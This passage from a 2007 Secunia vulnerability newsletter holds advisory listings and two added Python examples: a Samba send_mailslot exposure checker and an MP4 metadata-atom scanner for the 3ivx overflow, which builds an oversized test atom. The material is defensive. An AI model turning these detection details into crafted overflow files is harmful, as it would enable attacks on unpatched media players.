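"""Exposure check for the Samba send_mailslot() issue (SA27760) described
above: affected when the running Samba is older than 3.0.28 AND the
"domain logons" option is enabled in the [global] section of smb.conf.

Added example; not Samba's or Secunia's code. The version-string format
(as printed by `smbd -V`) and the two sample smb.conf files below are
assumptions constructed for this illustration.
"""
import re

FIXED_VERSION = (3, 0, 28)  # first upstream release with the fix, per the advisory

# Constructed sample: a domain controller with the trigger option enabled.
PDC_SMB_CONF = """\
[global]
   workgroup = EXAMPLE
   security = user
   # Samba ignores case and whitespace in parameter names
   DomainLogons = Yes

[netlogon]
   path = /var/lib/samba/netlogon
"""

# Constructed sample: a plain file server. The option appears only
# commented out or inside a share section, so it is NOT enabled.
FILESERVER_SMB_CONF = """\
[global]
   workgroup = EXAMPLE
   security = user
; domain logons = yes

[public]
   path = /srv/public
   # global-only parameter in a share section: not honoured
   domain logons = yes
"""


def parse_samba_version(text):
    """Return (major, minor, patch) from e.g. 'Version 3.0.27a'.

    The trailing letter marks a maintenance sub-release; it is dropped
    because the advisory places the fix in 3.0.28, and every 3.0.27x
    string sorts below that.
    """
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no x.y.z version in %r" % text)
    return tuple(int(part) for part in m.groups())


def _smb_bool(value):
    """Samba's boolean spellings; anything else is treated as unset."""
    v = value.strip().lower()
    if v in ("yes", "true", "1"):
        return True
    if v in ("no", "false", "0"):
        return False
    return None


def domain_logons_enabled(smb_conf):
    """True if 'domain logons' is enabled in [global].

    Rules applied: comment lines start with '#' or ';', parameter names
    are compared with case and whitespace removed, only [global] counts,
    a later definition overrides an earlier one, and the default is no.
    """
    enabled = False
    section = None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "global" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if "".join(key.split()).lower() == "domainlogons":
            parsed = _smb_bool(value)
            if parsed is not None:
                enabled = parsed
    return enabled


def samba_exposed(version_text, smb_conf):
    """True when both advisory conditions hold. A vendor or distribution
    backport (the advisory mentions a patch for 3.0.27a) keeps the old
    version string, so True means 'check the package changelog', not
    'confirmed vulnerable'. A False from the domain-logons test matches
    the advisory's stated trigger requirement regardless of version."""
    return parse_samba_version(version_text) < FIXED_VERSION and \
        domain_logons_enabled(smb_conf)


if __name__ == "__main__":
    for version, conf, label in (("Version 3.0.27a", PDC_SMB_CONF, "PDC"),
                                 ("Version 3.0.28", PDC_SMB_CONF, "PDC"),
                                 ("Version 3.0.27a", FILESERVER_SMB_CONF, "file server")):
        print("%-16s %-12s exposed=%s" % (version, label, samba_exposed(version, conf)))
```

The version test is only a first filter: the distribution updates listed later in this issue (Mandriva, Gentoo, rPath, SUSE, Debian, Slackware, Fedora) ship the fix without moving the package to 3.0.28, so an "exposed" result on a distribution host means checking the package changelog for the fix, not reinstalling Samba.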
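The 3ivx entry in the brief above names five metadata atoms whose contents overflow a stack buffer in 3ivxDSMediaSplitter.ax, and notes that no patch exists. An added example, not 3ivx's or Secunia's code: a small MP4 atom walker that descends the container hierarchy and reports any of those tagged atoms whose payload is larger than a chosen threshold, plus any atom whose size field does not fit the file. It assumes the tags are the iTunes-style metadata atoms (a 0xA9 byte followed by the three letters, found under moov/udta/meta/ilst), so it matches on the last three bytes of the type; the 256-byte threshold and the sample files are constructed for this illustration and do not come from the advisory.

```python
"""Scanner for the MP4 metadata atoms named in the 3ivx advisory above
(SA27998): reports "art", "nam", "cmt", "des" and "cpy" atoms whose
payload exceeds a threshold, plus any atom whose size field does not fit
the file. Added example; not 3ivx's or Secunia's code.

Assumptions made here: the tags are iTunes-style metadata atoms whose
four-byte type is 0xA9 followed by the three letters, found under
moov/udta/meta/ilst, so matching is done on the last three bytes of the
type, case-insensitively. The 256-byte threshold and the sample files
are constructed for this illustration.
"""
import struct

# Atoms whose payload is a sequence of child atoms.
CONTAINERS = {b"moov", b"udta", b"ilst", b"trak", b"mdia", b"minf", b"stbl"}
# "meta" is a full box: 4 bytes of version/flags precede its children.
FULLBOX_CONTAINERS = {b"meta"}
SUSPECT_TAGS = {b"art", b"nam", b"cmt", b"des", b"cpy"}


def iter_atoms(data, start=0, end=None, depth=0):
    """Yield (depth, type, payload_length, offset) for each atom, descending
    into known containers. A size that is truncated or exceeds the enclosing
    box yields payload_length None and ends the walk at that level."""
    end = len(data) if end is None else end
    pos = start
    while pos + 8 <= end:
        size, atype = struct.unpack(">I4s", data[pos:pos + 8])
        header = 8
        if size == 1:  # 64-bit largesize follows the type field
            if pos + 16 > end:
                yield depth, atype, None, pos
                return
            size = struct.unpack(">Q", data[pos + 8:pos + 16])[0]
            header = 16
        elif size == 0:  # atom runs to the end of the enclosing box or file
            size = end - pos
        if size < header or pos + size > end:
            yield depth, atype, None, pos
            return
        yield depth, atype, size - header, pos
        body = pos + header
        if atype in CONTAINERS:
            yield from iter_atoms(data, body, pos + size, depth + 1)
        elif atype in FULLBOX_CONTAINERS and size - header >= 4:
            yield from iter_atoms(data, body + 4, pos + size, depth + 1)
        pos += size


def find_suspect_atoms(data, limit=256):
    """Return (type, offset, payload_length) for every tagged metadata atom
    larger than `limit`; malformed atoms are reported with length None."""
    hits = []
    for _depth, atype, payload, offset in iter_atoms(data):
        if payload is None:
            hits.append((atype, offset, None))
        elif atype[1:].lower() in SUSPECT_TAGS and payload > limit:
            hits.append((atype, offset, payload))
    return hits


# --- constructed sample data (helpers are not part of the scanner) ---

def atom(atype, payload):
    """One atom with a 32-bit size field."""
    return struct.pack(">I", 8 + len(payload)) + atype + payload


def meta_tag(tag, text):
    """iTunes-style tag atom wrapping a 'data' atom (type 1 = UTF-8, locale 0)."""
    return atom(b"\xa9" + tag, atom(b"data", struct.pack(">II", 1, 0) + text))


def sample_mp4(title):
    """Minimal file: ftyp, then moov/udta/meta/ilst holding one (c)nam tag."""
    ilst = atom(b"ilst", meta_tag(b"nam", title))
    meta = atom(b"meta", b"\0\0\0\0" + ilst)
    return atom(b"ftyp", b"isom\0\0\0\0isom") + atom(b"moov", atom(b"udta", meta))


if __name__ == "__main__":
    print("benign:   ", find_suspect_atoms(sample_mp4(b"Example title")))
    print("oversized:", find_suspect_atoms(sample_mp4(b"A" * 1024)))
    print("truncated:", find_suspect_atoms(sample_mp4(b"A" * 16)[:-5]))
```

With the splitter unpatched, a filter of this kind on inbound media is one of the few controls available: it picks out the files to quarantine without ever handing them to the vulnerable parser. Keep the threshold generous; legitimate tags are short, and a false positive costs a manual look rather than a compromise.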
Secunia has constructed the Secunia Personal Software Inspector, which you can use to check if your personal system is vulnerable:
https://psi.secunia.com/

Corporate users can request a trial of the Secunia Network Software Inspector, which you can use to check which systems in your network are vulnerable:
http://secunia.com/network_software_inspector/

--

VIRUS ALERTS:

During the past week Secunia collected 257 virus descriptions from the Antivirus vendors. However, none were deemed MEDIUM risk or higher according to the Secunia assessment scale.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1.  [SA27934] Skype skype4com URI Handler Buffer Overflow
2.  [SA28036] Internet Explorer Multiple Code Execution Vulnerabilities
3.  [SA27938] Mac OS X vpnd Denial of Service Vulnerability
4.  [SA27947] Cisco Security Agent Unspecified System Driver Buffer Overflow Vulnerability
5.  [SA27945] Nokia N95 SIP Message Processing Denial of Service Weakness
6.  [SA27889] e2fsprogs libext2fs Integer Overflow Vulnerabilities
7.  [SA27941] IBM Lotus Sametime Meeting WebRunMenuFrame Page Cross-Site Scripting
8.  [SA27964] HP OpenView Network Node Manager Multiple Vulnerabilities
9.  [SA27965] SUSE Update for Multiple Packages
10. [SA27898] Cisco IP Phone 7940 SIP INVITE Denial of Service Vulnerability

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA28036] Internet Explorer Multiple Code Execution Vulnerabilities
[SA27992] JustSystems Ichitaro Document Processing Buffer Overflow
[SA28055] HP Info Center HPInfo Class ActiveX Control Insecure Methods
[SA28034] Windows Media Format Runtime ASF Parsing Vulnerabilities
[SA28031] BadBlue Multiple Vulnerabilities
[SA28010] Microsoft DirectX SAMI/WAV/AVI File Parsing Vulnerabilities
[SA27998] 3ivx MPEG-4 MP4 File Processing Buffer Overflows
[SA28038] Trend Micro Products UUE File Parsing Buffer Overflow
[SA28032] BarracudaDrive Web Server Multiple Vulnerabilities
[SA28007] Easy File Sharing Web Server Multiple Vulnerabilities
[SA27976] PenPal Three SQL Injection Vulnerabilities
[SA28051] Microsoft Windows Message Queuing Buffer Overflow
[SA27997] Microsoft Windows Vista SMBv2 Signing Vulnerability
[SA28019] Websense "username" Cross-Site Scripting Vulnerability
[SA28015] Windows Vista Kernel Legacy Reply Path Validation Privilege Escalation
[SA28011] Microsoft Windows Message Queuing Privilege Escalation
[SA28072] Kerio WinRoute Firewall Proxy Server Unspecified Security Bypass

UNIX/Linux:
[SA28068] Sun Solaris update for Adobe Flash Player
[SA28056] Red Hat update for java-1.4.2-bea
[SA28043] Fedora update for poppler
[SA28039] SUSE update for OpenOffice_org
[SA28001] Debian update for iceweasel
[SA27979] Fedora update for seamonkey
[SA27972] Fedora update for openoffice.org
[SA28060] Debian update for ruby-gnome2
[SA28050] Red Hat update for python
[SA28044] IBM AIX Multiple Unspecified Vulnerabilities
[SA28041] Avaya Products PCRE Multiple Vulnerabilities
[SA28033] Debian update for kernel
[SA28027] Red Hat update for python
[SA28022] Gentoo update for ruby-gtk2
[SA28021] Gentoo update for emul-linux-x86-qtlibs
[SA28008] Debian update for sitebar
[SA28002] wwwstats "link" Script Insertion Vulnerability
[SA27996] Debian update for qt-x11-free
[SA27989] Fedora update for eggdrop
[SA27985] Gentoo update for cairo
[SA27984] Gentoo update for emacs
[SA27975] Fedora update for ruby-gnome
[SA27973] Fedora update for drupal
[SA28067] Mandriva update for samba
[SA28029] Gentoo update for samba
[SA28028] rPath update for samba and samba-swat
[SA28003] SUSE update for samba
[SA27999] Debian update for samba
[SA27993] Slackware update for samba
[SA27982] Gentoo update for firebird
[SA27977] Fedora update for samba
[SA28062] Debian update for htdig
[SA28061] Debian update for libnss-ldap
[SA28042] Mandriva update for e2fsprogs
[SA28030] rPath update for e2fsprogs
[SA28000] Ubuntu update for e2fsprogs
[SA27987] Debian update for e2fsprogs
[SA27983] Gentoo update for PEAR-MDB2
[SA27980] Fedora update for nagios
[SA27971] Avaya Products Apache mod_proxy "date" Denial of Service
[SA27967] Ubuntu update for tetex-bin and texlive-bin
[SA28040] Mandriva update for MySQL
[SA28052] Red Hat autofs "/net" Privilege Escalation Vulnerability
[SA28023] Gentoo update for lookup
[SA28004] Fedora update for xorg-x11-xfs
[SA27978] Fedora update for zabbix
[SA28070] Linux Kernel "mmap_min_addr" Security Bypass
[SA28057] Avaya CMS / IR Solaris Remote Procedure Call Module Denial of Service
[SA28048] Mac OS X "cs_validate_page()" Local Denial of Service

Other:
[SA27970] IBM HMC Version 3 Privilege Escalation Vulnerabilities

Cross Platform:
[SA28066] ViArt CMS/HelpDesk/Shop "root_folder_path" File Inclusion
[SA28058] CityWriter "path" File Inclusion Vulnerability
[SA28054] Fastpublish CMS designconfig.php File Inclusion
[SA28047] Falcon Series One Multiple Vulnerabilities
[SA28018] Sun StarOffice/StarSuite Database Document Processing Arbitrary Java Method Execution
[SA27974] Novell NetMail AntiVirus Agent Integer Overflow Vulnerability
[SA28080] Robocode Arbitrary Java Code Execution Security Issue
[SA28075] MMS Gallery PHP "id" File Inclusion Vulnerabilities
[SA28071] xml2owl "file" Information Disclosure Vulnerability
[SA28053] Mcms Easy Web Make "template" Local File Inclusion
[SA28045] Falt4 CMS Cross-Site Scripting and SQL Injection Vulnerabilities
[SA28035] Cybozu Office Multiple Vulnerabilities
[SA28014] aurora framework "pack_var()" SQL Injection Vulnerability
[SA28013] PolDoc Document Management System "filename" Information Disclosure
[SA27990] DWdirectory "search" SQL Injection Vulnerability
[SA27988] Ace Image Hosting Script "id" SQL Injection Vulnerability
[SA27986] Content Injector "id" SQL Injection Vulnerability
[SA28082] Hitachi Web Server Cross-Site Scripting Vulnerabilities
[SA28081] Apache mod_imap Module Cross-Site Scripting Vulnerability
[SA28078] BEA WebLogic Mobility Server Image Converter Security Bypass
[SA28077] JBoss Seam "order" EJBQL Injection Vulnerability
[SA28073] Apache mod_imap Module Cross-Site Scripting Vulnerability
[SA28069] Rainboard Unspecified Cross-Site Scripting
[SA28063] MySQL Security Issue and Two Vulnerabilities
[SA28049] Cybozu Products Cross-Site Scripting and HTTP Header Injection
[SA28046] Apache mod_imagemap Module Cross-Site Scripting Vulnerability
[SA28024] bitweaver Cross-Site Scripting Vulnerabilities
[SA28012] Serendipity Remote RSS Sidebar Plugin Script Insertion
[SA28006] WebSPELL Multiple Cross-Site Scripting Vulnerabilities
[SA28005] WordPress GBK/Big5 Character Set "s" SQL Injection
[SA27966] OpenNewsletter "type" Cross-Site Scripting
[SA28026] Websense User-Agent Filtering Bypass Security Issue
[SA27981] MySQL System Table Information Overwrite Vulnerability

========================================================================
5) Vulnerabilities Content Listing

Windows:
--
[SA28036] Internet Explorer Multiple Code Execution Vulnerabilities
Critical:    Extremely critical
Where:       From remote
Impact:      System access
Released:    2007-12-11

Some vulnerabilities have been reported in Internet Explorer, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/28036/

--
[SA27992] JustSystems Ichitaro Document Processing Buffer Overflow
Critical:    Extremely critical
Where:       From remote
Impact:      System access
Released:    2007-12-13

A vulnerability has been reported in JustSystems Ichitaro, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27992/

--
[SA28055] HP Info Center HPInfo Class ActiveX Control Insecure Methods
Critical:    Highly critical
Where:       From remote
Impact:      Manipulation of data, Exposure of system information, System access
Released:    2007-12-12

porkythepig has reported some vulnerabilities in HP Info Center, which can be exploited by malicious people to gain knowledge of certain system information, manipulate registry data, and to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/28055/

--
[SA28034] Windows Media Format Runtime ASF Parsing Vulnerabilities
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2007-12-11

IBM X-Force has reported four vulnerabilities in Windows Media Format Runtime / Windows Media Services, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/28034/

--
[SA28031] BadBlue Multiple Vulnerabilities
Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Exposure of sensitive information, System access
Released:    2007-12-11

Luigi Auriemma has reported some vulnerabilities in BadBlue, which can be exploited by malicious people to disclose sensitive information, bypass certain security restrictions, and compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/28031/

--
[SA28010] Microsoft DirectX SAMI/WAV/AVI File Parsing Vulnerabilities
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2007-12-11

Two vulnerabilities have been reported in Microsoft DirectX, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/28010/

--
[SA27998] 3ivx MPEG-4 MP4 File Processing Buffer Overflows
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2007-12-10

SYS 49152 has discovered some vulnerabilities in 3ivx MPEG-4, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/27998/

--
[SA28038] Trend Micro Products UUE File Parsing Buffer Overflow
Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2007-12-12

Sowhat has reported a vulnerability in some Trend Micro products, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/28038/

--
[SA28032] BarracudaDrive Web Server Multiple Vulnerabilities
Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data, Exposure of system information, Exposure of sensitive information, DoS
Released:    2007-12-11

Luigi Auriemma has reported some vulnerabilities in BarracudaDrive Web Server, which can be exploited by malicious users to manipulate certain data and cause a DoS (Denial of Service), and by malicious people to conduct script insertion attacks and disclose sensitive information.
Full Advisory:
http://secunia.com/advisories/28032/

--
[SA28007] Easy File Sharing Web Server Multiple Vulnerabilities
Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information, System access
Released:    2007-12-10

Luigi Auriemma has reported some vulnerabilities in Easy File Sharing Web Server, which can be exploited by malicious people to disclose sensitive information and by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/28007/

--
[SA27976] PenPal Three SQL Injection Vulnerabilities
Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2007-12-07

Aria-Security Team has reported some vulnerabilities in PenPal, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/27976/

--
[SA28051] Microsoft Windows Message Queuing Buffer Overflow
Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2007-12-11

A vulnerability has been reported in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/28051/

--
[SA27997] Microsoft Windows Vista SMBv2 Signing Vulnerability
Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2007-12-11

A vulnerability has been reported in Microsoft Windows Vista, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/27997/

--
[SA28019] Websense "username" Cross-Site Scripting Vulnerability
Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2007-12-11

Dave Lewis has reported a vulnerability in Websense Enterprise and Websense Web Security Suite, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/28019/

--
[SA28015] Windows Vista Kernel Legacy Reply Path Validation Privilege Escalation
Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2007-12-11

A vulnerability has been reported in Microsoft Windows Vista, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/28015/

--
[SA28011] Microsoft Windows Message Queuing Privilege Escalation
Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2007-12-11

A vulnerability has been reported in Microsoft Windows, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/28011/

--
[SA28072] Kerio WinRoute Firewall Proxy Server Unspecified Security Bypass
Critical:    Not critical
Where:       Local system
Impact:      Security Bypass
Released:    2007-12-13

A weakness has been reported in Kerio WinRoute Firewall, which potentially can be exploited by malicious, local users to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/28072/

UNIX/Linux:
--
[SA28068] Sun Solaris update for Adobe Flash Player
Critical:    Highly critical
Where:       From remote
Impact:      Exposure of sensitive information, System access
Released:    2007-12-12

Sun has issued an update for Adobe Flash Player. This fixes some vulnerabilities, which can be exploited by malicious people to gain knowledge of sensitive information or compromise a user's system.

Full Advisory:
http://secunia.com/advisories/28068/

--
[SA28056] Red Hat update for java-1.4.2-bea
Critical:    Highly critical
Where:       From remote
Impact:      System access, DoS
Released:    2007-12-12

Red Hat has issued an update for java-1.4.2-bea. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/28056/

--
[SA28043] Fedora update for poppler
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2007-12-11

Fedora has issued an update for poppler. This fixes some vulnerabilities, which can be exploited by malicious people to compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/28043/

--
[SA28039] SUSE update for OpenOffice_org
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2007-12-11

SUSE has issued an update for OpenOffice_org. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/28039/

--
[SA28001] Debian update for iceweasel
Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, DoS, System access
Released:    2007-12-10

Debian has issued an update for iceweasel. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site request forgery and cross-site scripting attacks or potentially to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/28001/

--
[SA27979] Fedora update for seamonkey
Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, DoS, System access
Released:    2007-12-10

Fedora has issued an update for seamonkey. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting and cross-site request forgery attacks and potentially to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/27979/

--
[SA27972] Fedora update for openoffice.org
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2007-12-10

Fedora has issued an update for openoffice.org. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/27972/

--
[SA28060] Debian update for ruby-gnome2
Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-12

Debian has issued an update for ruby-gnome2. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/28060/

--
[SA28050] Red Hat update for python
Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information, DoS, System access
Released:    2007-12-11

Red Hat has issued an update for python. This fixes a security issue and a vulnerability, which can be exploited by malicious people to disclose potentially sensitive information, cause a DoS (Denial of Service), or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/28050/

--
[SA28044] IBM AIX Multiple Unspecified Vulnerabilities
Critical:    Moderately critical
Where:       From remote
Impact:      Unknown
Released:    2007-12-12

Multiple vulnerabilities have been reported in IBM AIX, which have unknown impacts.

Full Advisory:
http://secunia.com/advisories/28044/

--
[SA28041] Avaya Products PCRE Multiple Vulnerabilities
Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information, DoS, System access
Released:    2007-12-13

Avaya has acknowledged some vulnerabilities in various Avaya products, which can be exploited by malicious people to disclose sensitive information, cause a DoS (Denial of Service), or potentially compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/28041/

--
[SA28033] Debian update for kernel
Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-11

Debian has issued an update for the kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users and by malicious people to cause a DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/28033/

--
[SA28027] Red Hat update for python
Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information, DoS, System access
Released:    2007-12-11

Red Hat has issued an update for python. This fixes some security issues and a vulnerability, which can be exploited by malicious people to disclose potentially sensitive information, cause a DoS (Denial of Service), or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/28027/

--
[SA28022] Gentoo update for ruby-gtk2
Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-10

Gentoo has issued an update for ruby-gtk2. This fixes a vulnerability, which can potentially be exploited by malicious people to compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/28022/

--
[SA28021] Gentoo update for emul-linux-x86-qtlibs
Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-10

Gentoo has issued an update for emul-linux-x86-qtlibs. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/28021/

--
[SA28008] Debian update for sitebar
Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Exposure of sensitive information, System access
Released:    2007-12-10

Debian has issued an update for sitebar. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks, and by malicious users to disclose potentially sensitive information and compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/28008/

--
[SA28002] wwwstats "link" Script Insertion Vulnerability
Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2007-12-10

Jesus Olmos Gonzalez has reported a vulnerability in wwwstats, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/28002/

--
[SA27996] Debian update for qt-x11-free
Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-10

Debian has issued an update for qt-x11-free. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/27996/

--
[SA27989] Fedora update for eggdrop
Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2007-12-11

Fedora has issued an update for eggdrop. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27989/

--
[SA27985] Gentoo update for cairo
Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2007-12-10

Gentoo has issued an update for cairo. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/27985/

--
[SA27984] Gentoo update for emacs
Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2007-12-10

Gentoo has issued an update for emacs. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/27984/

--
[SA27975] Fedora update for ruby-gnome
Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-10

Fedora has issued an update for ruby-gnome. This fixes a vulnerability, which can potentially be exploited by malicious people to compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/27975/

--
[SA27973] Fedora update for drupal
Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2007-12-10

Fedora has issued an update for drupal. This fixes a vulnerability, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/27973/

--
[SA28067] Mandriva update for samba
Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2007-12-12

Mandriva has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/28067/

--
[SA28029] Gentoo update for samba
Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2007-12-11

Gentoo has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/28029/

--
[SA28028] rPath update for samba and samba-swat
Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2007-12-11

rPath has issued an update for samba and samba-swat. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/28028/

--
[SA28003] SUSE update for samba
Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2007-12-12

SUSE has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/28003/

--
[SA27999] Debian update for samba
Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2007-12-11

Debian has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27999/

--
[SA27993] Slackware update for samba
Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2007-12-11

Slackware has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27993/

--
[SA27982] Gentoo update for firebird
Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2007-12-10

Gentoo has issued an update for firebird. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27982/

--
[SA27977] Fedora update for samba
Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2007-12-11

Fedora has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27977/

--
[SA28062] Debian update for htdig
Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2007-12-12

Debian has issued an update for htdig. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/28062/

--
[SA28061] Debian update for libnss-ldap
Critical:    Less critical
Where:       From remote
Impact:      Manipulation of data
Released:    2007-12-12

Debian has issued an update for nss-ldap. This fixes a security issue, which can be exploited by malicious persons to manipulate certain data.

Full Advisory:
http://secunia.com/advisories/28061/

--
[SA28042] Mandriva update for e2fsprogs
Critical:    Less critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-11

Mandriva has issued an update for e2fsprogs. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/28042/

--
[SA28030] rPath update for e2fsprogs
Critical:    Less critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-12

rPath has issued an update for e2fsprogs. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/28030/

--
[SA28000] Ubuntu update for e2fsprogs
Critical:    Less critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-10

Ubuntu has issued an update for e2fsprogs. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/28000/

--
[SA27987] Debian update for e2fsprogs
Critical:    Less critical
Where:       From remote
Impact:      DoS, System access
Released:    2007-12-10

Debian has issued an update for e2fsprogs. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise an application using the library.

Full Advisory:
http://secunia.com/advisories/27987/

--
[SA27983] Gentoo update for PEAR-MDB2
Critical:    Less critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2007-12-10

Gentoo has issued an update for PEAR-MDB2. This fixes a security issue, which can be exploited by malicious people to disclose potentially sensitive information.
Full Advisory:
http://secunia.com/advisories/27983/

--
[SA27980] Fedora update for nagios
Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2007-12-10

Fedora has issued an update for nagios. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/27980/

--
